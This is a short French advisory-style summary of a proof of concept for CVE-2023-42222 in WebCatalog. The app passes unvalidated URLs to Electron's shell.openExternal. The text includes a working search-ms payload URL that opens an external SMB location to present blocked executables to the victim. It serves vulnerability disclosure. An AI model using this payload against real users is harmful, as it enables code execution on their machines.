
Exploit de preuve de concept pour CVE-2023-42222 dans WebCatalog, démontrant l'exécution d'URL arbitraire via shell.openExternal d'Electron pour contourner les protections de sécurité et exécuter du code.
WebCatalog avant la version 48.4.0 appelle la fonction Electron shell.openExternal sans vérifier que l'URL est bien une ressource http ou https, dans certaines circonstances. Cette vulnérabilité permet à un attaquant d'exécuter du code sur la machine de la victime en envoyant des messages contenant des liens avec des protocoles arbitraires. La victime doit interagir avec le lien et voit l'URL qui est ouverte.


La vulnérabilité peut être confirmée en synchronisant une page qui autorise des URLs arbitraires. Si un site web est synchronisé contenant search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools, alors une connexion SMB externe est créée. Cela peut ensuite être utilisé pour contourner les protections de sécurité sur la machine locale et présenter des fichiers malveillants à l'utilisateur, qui seraient normalement bloqués.